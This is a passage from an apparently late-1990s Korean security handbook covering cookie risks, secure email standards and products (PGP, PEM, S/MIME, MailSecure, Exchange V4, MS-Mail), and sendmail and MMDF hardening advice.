쿠키는 위에 설명한 대로, 서버를 위해 (사용자) 상태 정보를 유지하려는 목적으로 만들어졌다. 서버 쿠키는 정보 항목과 함께 유효한 도메인 이름, 유효기간, 버전 및 안전하게 전송되어야 하는지 (즉 HTTP/SSL을 통해) 를 가리키는 플래그를 가지고 있다. 클라이언트 쿠키는 정보 항목과 함께 유효한 도메인 이름, 버전 및 경로를 가지고 있다. 클라이언트들은 쿠키당 4KB와 1.2MB 데이타로, 총 300 개의 쿠키를 가질 수 있을 것으로 가정된다 (서버당 20 쿠키).
가능한 문제들:

• 쿠키가 clear text로 전송된다.
• 서버들이 쿠키를 공유할 수 있다 (프라이버시 위험).
• 서비스 거부: 쿠키가 너무 많으면 클라이언트나 서버 소프트웨어가 중단되거나 멈출 수 있다.
• 공격자에 의해 위장 쿠키가 삽입되어, 신뢰할 수 있는 서버와 말하고 있다고 생각하는 클라이언트가 중요한 정보를 제공할 수 있다.

쿠키가 걱정스럽다면, Navigator & Explorer 를 설정하여 서버가 쿠키 설정을 요청하면 경고를 발생시키도록 할 수 있다. 많은 사이트들이 쿠키를 광범위하게 사용하고 있기 때문에 실제로는 이것이 어렵다. 또다른 대안은 쿠키를 관리하기 위한 도구를 설치하는 것이다.

가용성

가능한 한 전용 WWW 웹 서버를 사용하여 서버가 침투됐을 시의 피해를 최소화한다.

중복성 (Redundancy)

별개의 IP 주소를 가지나 같은 DNS 이름으로 매핑되는 동일한 WWW 서버를 사용함으로써, 중복 (redundant) WWW 서비스가 제공될 수 있다. 이 때 문제는 다중 서버들 간에 자동적으로 문서를 동기화 하는 것이다. SSH 와 rdist 를 사용하여 이를 해결할 수 있다.

인터넷 화폐

이 짧은 절은 호기심 많은 사람들을 위해 넣은 것이다. 인터넷 상거래로의 어려운 장애물 중 하나는 상품/서비스를 어떻게 하면 안전하게 주문하고 지불할 수 있느냐이다.
고전적인 방법은 SSL을 써서 온라인 주문 세션을 암호화 하고 신용카드를 써서 지불하는 것이다. 그러나, 새로운 지불 시스템들이 나오고 있다, 예를 들면:

• Cyber Cash: 브라우저에 내장된 가상 지갑 개념을 이용. http://www.cybercash.com/ 참조
• FirstVirtual: 이메일 주소와 신용카드 번호를 PIN 과 연관시킨다. 그러면 사용자는 PIN 을 이용해 지불하면 된다. Spyglass 브라우저에서 지원한다. http://www.fv.com/ 참조.
• Digicash/E-cash: 전자 은행에서 현금을 인출하여 온라인 상에서 쓸 수 있게 해준다. 현 시험 단계에서는 공개키 암호화가 사용된다. Digicash는 클라이언트에게 특별한 소프트웨어를 제공한다. http://www.digicash.com/ 참조.

이메일

다양한 많은 제품들(종종 호환되지 않는)이 다양한 많은 플랫폼 상에서 사용되고 있다: MS-Mail, Teamlinks, VMSmail, X.400, Mail Exchanger, 인터넷 (유닉스) 메일 및 IBM Host 메일 등등. 대기업 내에서는 보통 X.400 이 백본 프로토콜로, 독자적 프로토콜들에 대한 게이트웨이를 가지고 있다. Lotus notes 는 아마도 오늘날 가장 일반적인 시스템일테지만, 저자는 이에대한 경험이 없다 (그래서 여기에 언급하지 않았다).

X.500 은 표준화된 디렉토리 서비스이며 승인을 구하고 있는 중인데, 진척이 느리다. 이를 인터넷 디렉토리로 구현한 LDAP 은 일상화되고 있다.

안전한 이메일

회사의 통일된 보안 메일 시스템은 매우 중요하게 다루어져야 한다. 하지만 전세계적으론 말할 것도 없거니와 미국 내에서도 이러한 서비스를 제공하는 제품은 거의 없다.
아직 일반적으로 통용되는 보안 메일 체계가 없지만 S/MIME은 조금이나마 보안 메일 시스템의 미래를 제시한다. (밑을 참조한다) 보안 메일 시스템의 개념에 다음을 고려할 수 있다:

• 강력한 암호화와 전자서명을 사용해야 한다.
• 스마트카드와 연동이 가능해야 한다.
• S/MIME와 호환이 되어야 한다. PGP와 호환되도록 설정가능하면 더욱 좋다. (이것은 두 종류의 다른 인증서 형식을 지원하는 것을 의미하며 받는이에 따라 S/MIME 또는 PGP의 사용을 정할 수 있어야 한다.)
• 기업형 솔루션 (많은 사용자) 으로 사용할 보안메일 체계는 CA의 구조, 사용 도구들의 선택 그리고 이메일 사용자를 고려한 사용자 환경이 중요하다.
• LDAP를 사용한 인증서, 일련의 인증서, CRL(Certificate Revocation Lists) 또는 이메일 주소 가져오기를 지원해야 한다.
• CRL과 일련의 인증서들 (최상위 CA 까지 또는 상호 인증 인증서) 에 관한 검증이 가능해야 한다.
• X503 v1-3을 따르는 인증서와 v2의 CRL을 사용해야 한다.
• 인증서와 CRL을 PC에서 로컬로 관리하기 위한 로컬 키 관리 기능이 있어야 한다. 즉 인증서와 CRL을 가져오고, 내보내고, 보고, 검사하며, 인증서를 이메일 주소에 연관시킨다.
• 패스워드를 얼마나 자주 입력해야 하는지를 설정할 수 있어야 한다: 로그인 세션마다, 트랜잭션마다 또는 일정 시간마다.
• 전자서명의 검증결과를 사용자에게 윈도우로 보여주는지 아니면 사용자가 메뉴나 버튼을 눌러 직접 확인하는지를 설정할 수 있어야 한다.
• 전자서명의 검증결과를 사용자에게 보여줄 때, 관련된 모든 인증서를 보여주어야 하고 어느 CRL을 확인했는지를 나타내야 한다.
• CA 인증서 migration 을 지원할 수 있어야 한다, 즉 "migration certificates" 를 처리할 수 있어야 한다 (새로운 비밀키로 오래된 CA 공개키에 서명 (forward compatibility) 그리고 오래된 비밀키로 새로운 공개키에 서명 (backward compatibility)).

저자가 아는 보안 메일 시스템 중 위에 나열된 모든 조건을 만족하는 시스템은 없다. 그밖에 보안 메일 시스템 평가시 고려할 사항들은:

• 이메일 전송중 또는 도착시에 어떻게 기밀성이 보장되는가? 이메일의 내용은 암호화되어 보관되는가?
• 이메일의 내용의 무결성은 어떻게 보장되는가?
• 이메일이 누구로부터 오는지 어떻게 확신할 수 있는가 - 송/수신 부인 방지 ? (전자서명)
• 이메일은 업무 흐름에 어떻게 통합되는가?
• 비밀/공개키는 어떻게 관리되는가? 디렉토리 서비스?
• 얼만큼의 가용성 레벨이 요구되는가, 어떻게 보장될 수 있는가?
• 보안 기능은 최종 사용자에게 얼마나 투명한가? 안전하게 메일을 전송하기가 너무 어렵거나 느리면, 사용자들이 대개 쉬운 옵션을 택할 것이다: - 보안 없음 (no security).
• 중앙 인증 기관이 있는가? X.500 과 호환이 되는가? 기업의 다른 네이밍 시스템들과 호환이 되는가?
• 다른 사내 메일 시스템들 및 파트너 업체에서 사용하는 것과 어떻게 상호 작용하는가?

안전한 전송과 전자 서명을 제공하는 몇몇 다중 플랫폼 제품들이 있다.

PGP

PGP를 제공하는 무료/유료제품들이 있으며, 전자우편이나 파일을 암호화하는데 사용된다. PGP는 보안 메카니즘 장에 언급되어있다.

PEM

PEM (Privacy Enhanced Mail) 은 보안 메일 표준으로 제안되었는데, Internet Activities Board 에서 아직 채택되지는 않았다. PEM 은 인증과 키관리를 포함하고 있으며, 공개 및 공용 키 암호 시스템을 모두 사용한다 (어떤 암호를 선택하는지 사용자가 선택한다).

• CBC 모드로 암호화되는 DES는 본질적으로 지원되며 RSA와 DES 키 관리가 지원된다.
• PEM은 인증서도 사용할 수 있다 (CCITT X.509 표준에 정의된 대로).
• TIS 는 공개 도메인 구현을 제공한다.
• RFC1421-1424 도 참조한다.

S/MIME (May'98)

Secure MIME 은 안전한 이메일 교환을 위한 새로운 (제안된) 인터넷 표준으로 RSA에서 개발했다. 아직 공식적인 표준은 아니지만, 여러 벤더들이 (Netscape를 포함해서) 이미 S/MIME을 지원하고 있다. 공개 인터넷 표준이므로, 아마도 가장 좋은 장기적 솔루션일 것이다.

일반적으로 서버에서 S/MIME을 위한 변경은 필요치 않다. 예를 들어 MS Exchange 에서는, MAPI 인터페이스를 통해 익스체인지 클라이언트와 통합된다.

몇몇 제품들은:

Open Soft (www.opensoft.com 1997) 는 사용자당 $32 이고, 익스체인지와 동작하며 키 서버를 포함하고 있다. 미국 수출 규제 대상. 익스체인지와는 확실히 잘 동작한다.

Deming (www.deming.com) 도 익스체인지 호환 시스템을 제공하고 사용자당 $90 정도. 미국 수축 규제 대상.

이점:

1. Eudora Pro 3.0 과 Exchange 모두와 작동한다 (그리고 같은 시스템에서 같은 인증서를 쓸 수 있다).
2. 익스체인지 서버에는 변경이 필요없다.
3. 인증서는 자체 서명되거나, VeriSign 같은 TTP에 의해 서명될 수 있다 (디폴트). 추후에는 텔레콤 TTP 에 통합될 수도 있다.

단점:

1. 사용자 인터페이스가 완벽하지 않다, 이를테면 사용자가 우발적으로 암호화되지 않은 이메 일을 보내기가 쉽다. 이메일을 나타내는 데 사용되는 아이콘은 수신된 이메일이 성공적으로 해독되었는지 그리고 서명이 확인되었는지 표시하는 것 같지 않다. 지원 비용을 높이기는 하지만, 이러한 문제들은 툴바에 별도의 버튼을 추가함으로써 극복할 수 있다.
2. 서명된 메시지가 현재 인증서가 없는 사용자로부터 수신되었을 때, 인증서는 인증서 데이타베이스에 자동적으로 추가된다. 이 인증서가 사용될 수 있으려면, 먼저 수작업으로 신뢰되어져야(trusted) 한다. 이 절차가 일반 사용자들에게는 약간 헷갈리며, 서명된 이메일이 수신되었을 때 멋진 팝업 상자로 처리되어야 한다.
3. 인증서의 형식이 평범한 X.509 (.crt)가 아니라 PKCS (.p7c) 인 것 같다.

MailSecure:

Baltimore Technologies (http://www.baltimore.ie)의 MailSecure 는, 군사급 강도의 암호화를 가지는 얼마 안되는 S/MIME Exchange 플러그인 중 하나이다. Baltimore 는 20년간 암호학 연구에 활발한 활동을 했으며, 이들이 암호화 알고리듬을 안전하게 구현할 수 있다는 확신을 갖게 하는 참고자료들을 제공한다. 이들은 안전한 웹 트랜잭션, 자바, 익스체인지 및 윈도우를 위한 제품들을 가지고 최근에야 상용 시장에 뛰어들었다.

• 사용자당 ~$80.
• CA: 자체 서명된 CA과 독자적인 인증 기관 시스템 (UniCERT) 을 사용할 수 있다. 인증서는 자신, UniCERT 그리고 (차후에) VeriSign 같이 PKS 형식을 지원하는 다른 CA들에 의해 서명된다. Baltimore 는 TTPs를 위한 EUROTRUST 라고 불리는 EU 재원 연구 프로젝트의 일부이다. 인증서들은 X.509 형식이다.

이점:

1. 강력한 암호화: 대칭 키: DES, 3DES 그리고 RC2 40-128 bit 및 공개 키 512-2048 bit. SHA-1 및 MD5 서명 알고리듬이 사용된다.
2. Exchange 에 완전히 통합 (Exchange와 POP3 서버 모두에 대해 테스트됨).
3. 패스문구는 아래와 같이 물을 수 있다:
   • 매번 또는
   • 시작할 때 (그리고 시작 후 특정 시간이 지나면 메모리에서 지워질 수도 있다).
4. S/MIME 툴킷은 원한다면 개발자들에게 별도로 판매될 수 있다.
5. V1.1.2 은 Exchange 4와 테스트되었다. Outlook 도 동작할 것이지만, 아직 테스트는 못해봤다.

단점 (주요 이슈들은 굵은 글씨로):

1. Exchange 5 는 MailSecure와 문제가 있다.
2. 메시지가 압축되지 않는다, 실제로 메시지 크기는 암호화될 때 거의 두배가 될 수 있다.
3. 인증서를 보호하기 위해 사용되는 패스워드에 대한 제약을 사용자에 맞게 조정할 수 없다. 사용자 필요에 따라 디폴트 설정이 너무 제한적일 수도 너무 느슨할 수도 있다. 사용자가 로그인 하는 다른 시스템들의 패스워드 제약조건과 같아야 한다.
4. 개발이 느린 것 같다: 베타에서 안정적인 제품으로 가는데 6개월 걸렸다. 지난 9개월 동안 새로운 기능은 추가되지 않았다.
5. Inbox assistant를 사용하여 암호화된 목적지로 자동 이메일 전달이 불가능 (패스문구가 매번 입력되어야 하므로)
6. 간헐적인 버그가 한두번 발견되었다: 메일작성(compose) 윈도우의 MailSecure 속성(File->Properties)은 Exchange 메시지 속성을 숨기고 있어, 메시지 속성이 (우선순위, 중요도, "보낸 편지함"에 복사본을 저장할 것인지 등) 변경되지 못한다.
7. 간헐적인 버그: 새 메일을 작성하고 나서, 인쇄하려고 하면 암호화할 것인지를 묻는다! 아무 의미가 없다.
8. 버그: 메일을 작성하다가, 도중에 무슨일이 있어 사무실을 나가야 했기에, 서명과 암호화 옵션을 모두 활성화 하여 메일을 저장했다. 저장된 메일은 더이상 읽을 수가 없었다 (smime-attachment로 암호화된 텍스트). (추측건대 수신자의 공개키로 메시지를 암호화해서, 원래 발신자가 읽을 수 없게 되는 것 같다?). 작업할 때: 임시 저장하지만 아직 보낼 준비가 안된 이메일은 암호화하지 말라.
9. 유용할 사용자 인터페이스 기능:
   • 보다 나은 인증서 관리:
     • 인증서를 삭제할 수 있어야 한다.
     • 여러개의 개인 인증서를 가질 수 있고 서명에 어떤 인증서가 사용될 지 선택할 수 있어야 한다.
     • 인증서는 설치되는 동안을 제외하고는 가져오기/내보내기할 수 없다.
     • 당장은 자체서명 및 Baltimore 서명된 인증서들만이 지원된다.
     • 사용자가 이메일 주소를 여러개 가지고 있을 수 있으므로 (이를테면 인터넷, X.400, Exchange..), 여러 개의 이메일 주소를 하나의 인증서에 할당할 수 있어야 한다.
   • 패스문구를 물어보고 나서 일정한 시간동안 메모리에 유지하는 패스문구 (Passphrase) 옵션 (시작할 때 뿐 아니라).
   • 메시지 민감도가 기밀로 설정되어 있으면 (Message properties 참조), 자동적으로 암호화 되어야 한다.
   • 인증서 디렉토리 서비스 (Certificate directory service): 새로운 메시지를 생성할 때, 동일한 이메일 주소와는 별도로 주소록에 있는 사용자들과 쓸 수 있는 인증서를 연관시킬 어떤 방법이 있어야 한다. 이메일 주소는 계속 변하므로 별명을 쓸 수도 있을 것이다. 이메일 주소 변경에 따라 각각 새로운 인증서가 필요하다. 새로운 V1.2 는 확실히 X.500 디렉토리를 지원한다.
   • 주소록에 있는 특정 사용자에 대해 암호화된 이메일을 필수로 "표시" 하는 것도 좋을 것이다. 또 추가 옵션으로 이 사용자들에게 이메일이 보내졌을 때만 "서명/암호화" 프롬프트가 나오도록 설정할 수 있다.
   • Eudora, Lotus Mail 은 지원되지 않지만, 차후에는 될 지도 모른다.

권고사항:

• 자기 인증서의 백업을 필수적으로 만들어 둔다 (e.g. c:\program files\mailsecure\YOURNAME.bsk and .pc7). 여러 대의 PC를 동시에 사용한다면, 이 인증서를 복사하여 다른 PC (e.g. 랩탑) 에서 사용할 수 있다.
• 디폴트 CA를 변경하려면, 레지스트리에서 다음 값을:

HKEY_CURRENT_USER/SOFTWARE/Baltimore-Technologies/BMail/RAEmail

UniMS Certificate request 프로세서의 이메일 주소로 편집한다.

이메일 서버와 시스템들

Microsoft Exchange V4

Exchange 는 Microsoft 의 이메일 기반 그룹웨어 제품으로서 3.51 또는 이상의 NT에서 작동하는 서버 프로그램이다. Exchange에는 MS-Mail, X400, 인터넷 메일 (SMTP) 이 기본으로 포함되어있고 Novel, cc:Mail 그리고 IBM PROFS 시스템을 위한 추가모듈을 제공한다. X.500 디렉토리 서비스를 완전히 지원하지 않으나 독자적 디렉토리 서비스 (proprietary directory service) 는 제공한다. Windows 95 와 NT4 에는 rich text format, 그룹 일정관리, 메시지 중요도 부여 그리고 온라인/오프라인 작업을 지원하는 Exchange 클라이언트가 포함되어 있다.

보안 관점에서 볼 때 Exchange V4는 다음 기능을 제공한다:

1. 안전한 데이타 교환:
• 전자 서명과 암호화 지원. CAST-64 또는 DES 알고리듬은 미국에서 그리고 CAST-40 은 어디서든지 사용될 수 있다. 모든 암호화는 서버가 아닌 클라이언트에서 수행된다. CAST는 어떤 것인가? (인터넷의 암호 관련 자료들 중 이 알고리듬에 대한 것을 찾을 수가 없었다). 아마 Microsoft 에서 만든 것으로 peer review에 내놓지 않은 것 같다.
• 고급 팩스 기능들도 통합되어 있다, 이를테면 전자서명이 있는 BFT (Binary File Transfer).
• Exchange 클라이언트는 전화접속 네트워킹 상에서도 작동하며 전화접속 네트워킹을 사용할 때만 암호화를 사용할 수도 있다. 원격 사용자들에게 유용한 기능이다.
2. 입증/부인방지: 사용자는 수신자가 이메일을 수신했는지 그리고/또는 읽었는지 확인을 요청할 수 있다. 수신자가 고급 보안 설정을 가지고 있다면 (즉 전자서명 사용), 사용자는 올바른 수신자가 실제로 그 정보를 읽었다는 것을 무리없이 확신할 수 있다.
3. 키 관리:
• 공개 및 개인키 관리가 사용된다. 두 쌍의 키가 있는데, 하나는 서명을 위한 것이고 하나는 암호화를 위한 것이다. 벌크(bulk) 암호화 키를 사용하려 복수의 수신자에게 안전하게 메시지를 보낸다. 공개키는 CA (Exchange의 경우 KM 서버) 에 의해 인증되어야 한다. 인증서는 사용자의 공개키를 특정 메일함에 묶어둔다.
• 관리자가 어떤 사용자에 대해 고급 보안을 설정했을 때, 관리자는 사용자에게 안전하게 전달되어야 하는 토큰 (기본적으로 사용자의 개인키를 가지고 있는) 을 받게 된다. [3]. 관리자는 토큰이 올바른 사람에 대해 생성되고 올바른 사람에게 보내졌는지 단영 확신할 수 있어야 하고, 토큰을 전송하기 위한 안전한 방법이 찾아져야 한다. 이 토큰은 임시이고 사용자가 클라이언트 쪽에서 고급 보안을 설정할 수 있게 해준다 (도구->옵션->보안에서). 사용자가 고급 보안을 설정할 때, 패스워드를 입력해야 한다. 이 패스워드는 추후 이메일이 서명/암호화/해독될 때마다 입력되어야 한다.
• 잃어버린 보안 토큰은 관리자가 복구할 수 있다 (Administration 윈도우에서 Recipients 선택 후, Security ->Recover Key). 키가 보이고 이제는 반드시 안전하게 사용자에게 전송되어야 한다.
• 사용자 토큰은 관리자(Administrator)가 취소할 수 있다 (Administration->Recipients->Choose mailbox -> Security-> Revoke Advanced Security).
4. 식별 & 인증:
• 주체 (사용자) 들은 NT 도메인 로그인을 통해 식별된다. 네트웍 메일함 접근을 위해 별도의 로그온이 사용될 수도 있고 아니면 NT 로그온 프로세스와 통합될 수도 있다.
• 고급 보안에서는, 사용자의 신원이 개인/공개 키 사용을 통해 인증된다.
5. 접근 통제:
• 개인 폴더는 PC에 보관될 수도 있다 (서버 대신). 뿐만 아니라 사용자는 로컬 하드 드라이브에 패스워드로 보호 그리고/또는 암호화되는 개인 폴더를 생성할 수 있다.
• "Groups" 는 공통된 폴더 접근 인가에 사용된다. 그룹 메일함도 가능하다.
• 공용 폴더에 대한 접근: Exchange는 각 폴더에 대해 접근통제 목록을 정의할 수 있게 한다. 서로 다른 사용자/그룹들은 서로 다른 사용허가를 받을 수 있다. 사용허가의 집합들은 역할 (role) 로 편성될 수 있다. 정의된 표준 역할들은 소유주 (owner) (모든 권한) 와 검토자 (reviewer) (읽기만 가능) 이다. 다른 사이트의 공용 폴더들을 로컬 복제 없이 접근할 수 있다 (해당되는 NT 도메인 트러스트가 존재한다면).
• 디렉토리 객체로의 접근 (조직, 사이트, 수신자, 등등) 도 위에서와 마찬가지로 ACL과 역할에 따라 통제된다. 대표적인 역할은 사용자 (특정 메일함에 모든 권한을 가지는) 이다. 사용허가는 부모 객체로부터 상속된다.
• 고급 보안은 사용자나 사이트별로 사용자에게 설정될 수 있다.
• 각 메일함은 암호화된 보안 파일 (.EPT) 을 가지고 있는데 여기에는 서명/암호화/복호화에 필요한 사용자의 개인키가 들어있다. 원격/이동 사용자들을 위해서는, 이 파일이 사용자의 로컬 디스크에 있어야 한다.
• 개인키 (공개키 뿐만 아니라) 의 백업 복사본이 KM 서버에 보관된다.
6. 감사/로그: NT 보안 로그에 이벤트들이 로그된다. 디렉토리 객체와 서비스의 변경에 대한 감사를 설정할 수 있다.
7. 가용성:
• Exchange는 트랜잭션 기반의 정보 저장소(information store)를 사용하는데, 이는 서버가 멈췄을 때 트랜잭션 로그를 사용하여 멈추기 전의 상태로 정보 저장소를 재건할 수 있다는 것을 의미한다.
• 공용 폴더와 디렉토리 서비스들은 사이트 내부 및 사이트들 사이에서 복제될 수 있다 (이메일 메시지들을 통해). 폴더 복제를 위한 스케쥴을 설정할 수 있고 복제 메시지 크기는 정체를 방지하기 위해 제한될 수 있다.
• 정보 저장소는 공용 또는 개인 폴더 크기를 제한하고, 사용기한을 설정하고 오래된 정보는 자동으로 삭제하도록 구성될 수 있다.
• 하나의 KM 서버가 여러 익스체인지 사이트에 사용될 수 있으나, KM 서버가 다운되었을 때 임무를 넘겨받을 수 있는 백업 KM 서버의 개념은 없다. KM 요청은 KM 서버 들의 한 그룹 내에서 공동관리 (pool) 될 수 없는데, 대규모 조직에서는 이것이 된다면 유용할 것이다.
• 지능적 재 라우팅: 하나의 연결이 끊어지면, Exchange 는 다른 연결을 통해 메시지를 다시 라우팅할 수 있다.

문제점:

• 익스체인지 클라이언트는 느리고 (많은 양의 메모리가 사용 가능하지 않다면) 빈번한 갱신이 필요하다. 클라이언트는 내용이 큰 (> 40kB) 메시지에 멈출 수 있다.
• 키관리는 다루기 어렵고 대규모 사용자 그룹에는 적당하지 않다.
• 암호화 강도가 미국 밖에서는 약하다.
• 인터넷으로 분리된 익스체인지 사이트들 간에는 고급 보안이 불가능하다.
• 이메일/폴더들은 관리자로부터 안전한다? 관리자가 개인키에 접근할 수 있으므로, 사용자 서명을 위조하여 사용자가 암호화한 이메일을 읽을 수 있을 것 같다? 사용자가 고급 보안을 설정하더라도, 키를 보호하기 위해 패스워드가 부여된다.
• 디렉토리 서비스는 X.500 과 호환되지 않으며, 키 인증서는 S/MIME 이나 PGP와 호환되지 않는다.

Exchange 5.0 에서 약속되는 향후의 기능들:

• 인터넷 같은공중망을 지날 때의 보안.
• 보다 나은 키 분배.
• 조직 그룹 서명 / 암호화.

권고사항:

• KM (Key Management) 서버에서는 NTFS 파일시스템을 사용하고, 물리적으로 보호되는 구역에 설치한다. 전용 서버의 사용을 고려한다.
• 키 데이타베이스를 주기적으로 백업한다, 사용자가 많을 경우 특히. 백업은 물리적으로 안전하게 보호되어야 한다.
• Administrator 와 KM service는 강력한 패스워드를 사용한다. 설치시 패스워드를 디스켓에 복사하도록 하고 재난 복구를 위해 디스켓을 물리적으로 안전하게 보호한다.

MS-Mail

Microsoft 메일은 다음 모듈들의 집합이다:
1. 클라이언트 (윈도우 상의 MS-mail).
2. 메일박스 서버 (우체국 PostOffice 이라고 불림).
3. 메일 주소 디렉토리 서버.
4. 메일 배달 프로세스 (외부).
5. X.400 백본에 대한 게이트웨이.

• 모든 메일 서버들은 (PostOffice, External, X.400 gateway, directory server) 안전하게 설치되어야 한다.
• DEC의 MAILworks 를 PostOffice 로 사용할 수 있다.
• 클라이언트들은 패스워드로 보호된 mail.dat 을 가지고 있어야 한다.
• 메일 배달 프로세스가 돌아가는 Mailext 사용자는, 메일함 디렉토리에 대해 모든 권한을 필요로 한다. 이 사용자의 패스워드는 거의 한번도 변경되지 않는다. 따라서 인가되지 않은 사용자들이 메일함에 접근하는 것을 방지하기 위해, PostOffice 에서 Mailext 사용자 설정은 명명된 외부 PC에서만 로그인할 수 있도록 구성되어야 한다.
• PostOffice 디렉토리는 평범하지 않은 이름으로 export 되어야 하고 (즉 maildata 같은 것 말고), exports 보기 목록에 나타나지 않도록 $ 로 끝나야 한다.
• 로그는 주기적으로 이상한 행위가 없는지 검사해야 한다 (\maildata\log\session.log,dispatch.log, recv.log, sent.log, x400xxxx.log)
• MS-Mail 에 대해 보안을 증대시키는 몇몇 제품들이 있다 (MAPI 또는 새로운 MS-Mail "note types" 기반으로 하는). 예를 들어, Secumail 은 Telia (Swedish Telecom) 제품으로 스웨덴에서 판매되며 MS-Mail & Exchange 사용자들의 안전한 통신을 가능하게 한다. 전자 서명과 암호화가 지원된다. 개인키는 칩 카드에 보관된다.

해결되지 않은 이슈

• 메일함 디렉토리에서 가능한 가장 제한적인 사용허가는?
• 별도의 로그인이 항상 필요한가?
• 메일은 로컬에 저장될 수도 있고 원격 메일함을 통해 접속할 수도 있다. 로컬 메일함이 더 안전한가?
• 그러나 어떤 사람이 다른 PC에 로그인 해서 메일을 읽을 수 없다. 분류된 등급에서 로컬이 더 나은가?

유닉스 메일 (SMTP, MIME, sendmail, MMDF)

관련 모듈들은
1. 클라이언트 메일 프로그램 (사용자가 메일을 읽을/보낼 수 있게 함), e.g. Mailtool, CDE dtmail, mailx, Zmail, /bin/mail...
2. 로컬 배달 프로그램, e.g. sendmail.
3. 로컬 수신 프로그램, e.g. sendmail, popper
4. 메일박스 서버, e.g. NFS server.
5. 도메인 게이트웨이 (로컬도메인으로(/부터 다른 도메인으로) 메일 전달).
6. 인터넷 게이트웨이 (인터넷으로의 방화벽).
7. X.400 게이트웨이 (또는 다른 기업 백본 프로토콜).

Sendmail

Sendmail 은 복잡하고, 역사적으로 아주 버그가 많은 프로그램이다. Sendmail 문제들에 대한 예는 부록에 있는 CERT 권고문들의 목록을 참고한다. 대부분의 벤더들은 약간 변형된 sendmail을 가지고 있지만, 최신의 V8 sendmail을 쓰는 벤더는 별로 없는데, V8은 더 많은 기능을 가지고 있으면서도 더 안전한 것으로 추정된다. [4].

==> PGP 같은 도구와 함께 사용하는 경우가 아니면 기밀 이메일의 전송에 sendmail 을 사용하지 않도록 한다.

• Sendmail V8 은 공개되어 있고 Eric Allman 이 유지보수한다. www.sendmail.org 참조. CERT 에 문제가 보고되면, 대개 패치가 금방 나온다. 벤더들은 몇달후에나 패치를 만드는 경향이다.
• 최신의 sendmail 벤더 패치를 설치한다 ;-)
• 가능하면, V8 sendmail 로 바꾼다, 즉 V8.7.3 이나 그 이후 버전 (1996 년 2월 현재). 그러나 이것은 전문가가 필요하다 (특히 이메일 게이트웨이에 대한). 문제는 역시 얼마나 많은 새로운 버그들이 sendmail V8에 있느냐이다. V8은 컴파일하기가 꽤 쉽지만, 설정 파일을 생성하는 것이 여전히 조잡하다.
• NFS를 통해 /var/mail (또는 /var/spool/mail) 을 마운트하는 클라이언트들에 대해서는, 메일이 NFS 서버로 배달되어야 하기 때문에 sendmail 데몬이 운영되고 있을 필요가 없으므로, sendmail 데몬을 중단한다.
  SunOS 에서는 /etc/rc.local 을 편집하고, Solaris 에서는, "mv /etc/rc2.d/S88sendmail /etc/rc2.d/.S88sendmail" 한 후 대기열에 있는 이메일을 확인하는 root cron 항목을 추가하고 (e.g. 0 * * * * /usr/lib/sendmail -q), 재부팅한다.
• 고전 (지금은 아주 오래된 문제들):
• /etc/aliases에서 decode 및 uudecode alias 들을 제거한다.
• Sendmail 에서 DEBUG 옵션이 작동하지 않도록 한다 (Sun 시스템에서는 괜찮다):
  strings /usr/lib/sendmail | grep DEBUG
• sendmail.cf 에서 wizard password 를 설정하지 않는다.
• Sendmail 로의 직접 접근을 막기 위해, 인터넷 이메일 게이트웨이에 대해 smap 같은 (방화벽 장 참조) sendmail front end를 설치한다.
• syslog 파일을 감시하여 "wiz" 나 "debug" 보안홀을 사용하려고 시도하는 해커들을 찾는다. 간단한 예로: grep "wiz|debug" /var/log/maillog
• smrsh (Sendmail Restricted Shell) 을 설치하여 sendmail이 출력을 보낼 수 있는 프로그램을 제한한다 (유닉스 도구에 대한 절 참조).
• 상용 대체프로그램으로의 변환을 고려한다 (www.innosoft.com 의 PMDF, MS-Exchange, etc.) 또는 MMDF (다음 절 참조).
• Sendmail 설정에 대한 유용한 팁들: Todd Lacy
• 나가는 메일이 사용자들의 .signature 파일의 내용으로 자동 서명된다면 사용자들이 이를 인식할 수 있다.

signmail 이라는 스크립트를 생성하여 이를 (예를들어) /usr/local/bin 에 설치한다. 사용자의 .mailrc에서 "sendmail" 을 /usr/local/bin/signmail 로 바꾼다. Signmail 은 다음과 같은 스크립트를 포함하고 있다:
#!/bin/sh
if [ -f ${HOME}/.signature ]; then
  (cat - ; echo "" ; cat ${HOME}/.signature) | exec /usr/lib/sendmail $*
else
  exec /usr/lib/sendmail $*
fi 

MMDF (Multi-channel Memo Distribution Facility)

아래는 몇몇 MMDF 문서들 중에서 추출한 것이다:

MMDF 는 다양한 사용자 인터페이스와 배달 메카니즘을 지원하는 메일 전송 시스템이다. 설계는 기존의 메일 시스템들과 호환될 필요성에 구애받지 않았고, 결과적으로 MMDF 는 통합 메일 처리 프로그램 집단이 되었다.
MMDF 의 설계는 단일 호스트 시스템으로부터 대형 메일 릴레이로 메일 시스템의 성능 저하 없이 성장할 수 있게 하며, 부하가 거대해짐에 따라 성능은 점차적으로 (gracefully) 저하되도록 한다. 대용량 메일 릴레이에 대한 요구가 MMDF의 많은 혁명적인 설계 선택들로 이어졌다.
다른 몇몇 시스템들과 달리, MMDF는 메일 의뢰와 배달에 별개의 프로세스를 가지고 있다. 죽은 호스트들 각각에 대한 재시도 이력에 따라 지능적인 재시도 전략을 허용하는 최근의 배달 소프트웨어 변화가 설명될 것이다. 새로운 도메인 서버 메카니즘의 주소 확인에 대한 효과가 논의될 것이다.
메일을 채널로 분리하는 것이 MMDF의 대량메일 처리능력에 대한 열쇠이다. 각 채널은 서로 다른 배달등급을 나타내고 각 채널이 자체적으로 대기열을 가지고 있다. 이것은 문제를 고립시키고 서로 다른 채널마다 서로 다른 레벨의 서비스를 제공할 수 있게 해준다.

MMDF 시스템은 원래 Delaware 대학에서 개발되었으며 Ballistic Research Laboratory 와 University College London 에서 괄목할만한 개발 성과를 보았다.

MMDFII 소프트웨어는 무료로 (테이프 복사 비용등은 제외하고), 다음의 내부에서만 사용할 수 있다: Ballistic Research Labs를 통해 미국 정부 기관에서, BBN의 CSNET Coordination and Information Center 를 통해 CSNET 사이트에, 그리고 Delaware 대학 Electrical Engineering and Computer Science Department의 David Farber 교수를 통해 다른 곳에.
내부 사용이 아닌 MMDF에 대한 상업적 관심을 Farber교수와 계약해야 한다.

1994년 이후로는 진보하지 않은 것 같고, 현재 버전은 V2.4.3 이며 MMDFIIb 라고 불린다. http://www.cs.okstate.edu/~vasoll/mmdf도 참조한다.

사무 자동화

MS-Office (윈워드/ 엑셀/ 파워포인트)

